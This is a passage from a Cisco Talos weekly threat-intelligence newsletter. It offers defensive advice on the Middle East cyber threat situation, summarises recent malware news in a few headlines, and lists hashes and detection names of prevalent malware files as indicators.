place.&#xA0;</p><blockquote class="kg-blockquote-alt"><em>&#x201C;We&#xA0;talkin&#x2019; numbers now. And numbers always&#xA0;gotta&#xA0;be in conversation with each other.&#x201D;&#xA0;-&#x202F;Smoke</em></blockquote><p>In vampire mythology, the barrier holds until someone inside grants entry.&#xA0;In&#xA0;cybersecurity, the same principle applies.&#xA0;Access is increasingly granted, not forced.&#xA0;</p><p>If you want to understand how measurable that shift has become, our 2025 Year in Review will be available on Monday on the Talos blog.</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Late on Friday,&#xA0;Cisco&#xA0;Talos&#xA0;<a href="https://blog.talosintelligence.com/talos-developing-situation-in-the-middle-east/" rel="noreferrer noopener"><u>updated our blog</u></a>&#xA0;on the developing situation in the Middle East. Talos assesses that the recent&#xA0;cyber attack&#xA0;on the medical equipment manufacturing firm, Stryker,&#xA0;likely represents&#xA0;an opportunistic compromise rather than a systematic shift toward targeting the health care sector specifically. Nevertheless, the broader threat landscape&#xA0;remains&#xA0;elevated due to ongoing military operations in Iran,&#xA0;necessitating&#xA0;that all organizations increase vigilance and strengthen their defensive capabilities against destructive cyber activity.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>Destructive malware, often&#xA0;leveraged&#xA0;by Iranian threat actors, can present a direct threat to an organization&#x2019;s daily operations,&#xA0;impacting&#xA0;the availability of critical assets and data. Disruptive&#xA0;cyber attacks&#xA0;against organizations in a target country may unintentionally spill over to organizations in other countries. The broader threat landscape&#xA0;remains&#xA0;elevated across all sectors amid ongoing military operations in Iran.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Organizations should increase vigilance and evaluate their capabilities, encompassing planning, preparation, detection, and response for such an event. Defenders should ensure security fundamentals are being adhered to, such as robust patching for known vulnerabilities, visibility into end-of-sale (EOS)/end-of-life (EOL) devices in your network with a plan to upgrade, and requiring multi-factor authentication (MFA) for remote access and on critical services. Patches for critical vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment should be prioritized. Organizations can also implement a patch management program that enables&#xA0;a timely&#xA0;and thorough patching cycle.&#xA0;&#xA0;</p><p>We will update&#xA0;<a href="https://blog.talosintelligence.com/talos-developing-situation-in-the-middle-east/" rel="noreferrer noopener"><u>this blog</u></a>&#xA0;with&#xA0;further&#xA0;developments accordingly.</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>New .NET AOT malware hides code as a black box to evade detection</strong>&#xA0;<br>This new Ahead-of-Time (AOT) method strips metadata away, turning the code into a black box, which forces experts to rely on manual, native-level tools to see what is&#xA0;actually happening&#xA0;under the hood. (<a href="https://hackread.com/net-aot-malware-code-black-box-evade-detection/" rel="noreferrer noopener"><u>HackRead</u></a>)&#xA0;</p><p><strong>SideWinder espionage campaign expands across Southeast Asia</strong>&#xA0;<br>The suspected India-linked threat group targets governments, telecom, and critical infrastructure using spear-phishing, old vulnerabilities, and rapidly rotating infrastructure to&#xA0;maintain&#xA0;persistent access. (<a href="https://www.darkreading.com/threat-intelligence/sidewinder-espionage-campaign-expands-across-southeast-asia" rel="noreferrer noopener"><u>Dark Reading</u></a>)&#xA0;</p><p><strong>Threat</strong>&#xA0;<strong>actor targeting VPN users in new credential theft campaign</strong>&#xA0;<br>The campaign started in mid-January,&#xA0;luring individuals looking for VPN software into downloading trojans that have been signed with a legitimate digital certificate to evade detection. (<a href="https://www.securityweek.com/threat-actor-targeting-vpn-users-in-new-credential-theft-campaign/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>Sears AI chatbot chats and audio files found exposed online</strong>&#xA0;<br>A researcher&#xA0;discovered three publicly exposed, unprotected databases&#xA0;containing&#xA0;a total of 3.7M chat logs, audio recordings, and text transcripts of phone calls from 2024 to 2026. (<a href="https://mashable.com/article/sears-ai-chatbot-chats-audio-found-exposed-online" rel="noreferrer noopener"><u>Mashable</u></a>)&#xA0;</p><p><strong>BeatBanker</strong>&#xA0;<strong>Android trojan uses silent audio loop to steal crypto</strong>&#xA0;<br>Most modern phones kill background apps to save battery, but these actors found a clever loophole. The app plays a tiny, five-second audio file on a loop. Your phone thinks&#xA0;it&#x2019;s&#xA0;an active music player, so it&#xA0;won&#x2019;t&#xA0;shut the app down. (<a href="https://hackread.com/beatbanker-android-trojan-silent-audio-loop-crypto/?utm_source=tldrinfosec" rel="noreferrer noopener"><u>HackRead</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://blog.talosintelligence.com/everyday-tools-extraordinary-crimes-the-ransomware-exfiltration-playbook" rel="noreferrer noopener"><strong><u>Everyday tools, extraordinary crimes: the ransomware exfiltration playbook</u></strong></a>&#xA0;<br>Attackers use trusted tools for data theft, making traditional detection unreliable. The Exfiltration Framework enables defenders to spot exfiltration by focusing on behavioral signals across endpoints, networks, and cloud environments rather than static tool indicators.&#xA0;</p><p><a href="https://blog.talosintelligence.com/transparent-com-instrumentation-for-malware-analysis/" rel="noreferrer noopener"><strong><u>Transparent COM instrumentation for malware analysis</u></strong></a>&#xA0;<br>Cisco Talos presents&#xA0;DispatchLogger, a new open-source tool that delivers high visibility into late-bound&#xA0;IDispatch&#xA0;COM object interactions via transparent proxy interception.&#xA0;</p><p><a href="https://www.buzzsprout.com/2033817/episodes/18822137" rel="noreferrer noopener"><strong><u>It&apos;s the B+ Team: Matt Olney returns</u></strong></a>&#xA0;<br>Matt is back to talk with the&#xA0;crew about&#xA0;about&#xA0;the most random things, including TikTok diagnosing us with ADHD, K-Pop Demon Hunters, ransomware in hospitals (the serious bit), attacker use of AI, and why 1999-era tricks are still undefeated.&#xA0;</p><p><a href="https://www.buzzsprout.com/2018149/episodes/18825324" rel="noreferrer noopener"><strong><u>Modernizing your threat hunt</u></strong></a>&#xA0;<br>David Bianco joins Amy to explore the evolution of the PEAK Threat Hunting framework and talk through how security teams can modernize their approach to&#xA0;identifying&#xA0;risks before they escalate.</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://aisecurityconf.com/" rel="noreferrer noopener"><u>AI Security &amp; Privacy Conference</u></a>&#xA0;(March 26) Gaia, Portugal&#xA0;</li><li><a href="https://www.botconf.eu/" rel="noreferrer noopener"><u>Botconf 2026</u></a>&#xA0;(April&#xA0;15 &#x2013; 17) Reims, France&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;&#xA0;<br>Example Filename:&#xA0;https_2915b3f8b703eb744fc54c81f4a9c67f.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201**&#xA0;</p><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;<br>Example Filename:&#xA0;d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;<br>Example Filename:&#xA0;APQ9305.dll&#xA0;&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256: 5bb86c1cd08fe5e1516cba35c85fc03e503bd1b5469113ffa1f1b9e10897f811</strong>&#xA0;&#xA0;<br>MD5: f3e82419a43220a7a222fc01b7607adc&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=5bb86c1cd08fe5e1516cba35c85fc03e503bd1b5469113ffa1f1b9e10897f811" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=5bb86c1cd08fe5e1516cba35c85fc03e503bd1b5469113ffa1f1b9e10897f811</u></a>&#xA0;&#xA0;<br>Example Filename: Accounts Final-2024 .exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Dropper.Suloc::1201**&#xA0;</p><p><strong>SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</strong>&#xA0;<br>MD5: 7bdbd180c081fa63ca94f9c22c457376&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91</u></a>&#xA0;&#xA0;<br>Example Filename: d4aa3e7010220ad1b458fac17039c274_62_Exe.exe&#xA0;&#xA0;<br>Detection Name:&#xA0;Win.Dropper.Miner::95.sbx.tg**&#xA0;</p><p><strong>SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</strong>&#xA0;<br>MD5: 41444d7018601b599beac0c60ed1bf83&#xA0;&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</u></a>&#xA0;<br>Example Filename: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55.js&#xA0;&#xA0;<br>Detection Name: W32.38D053135D-95.SBX.TG</p>]]></content:encoded></item></channel></rss>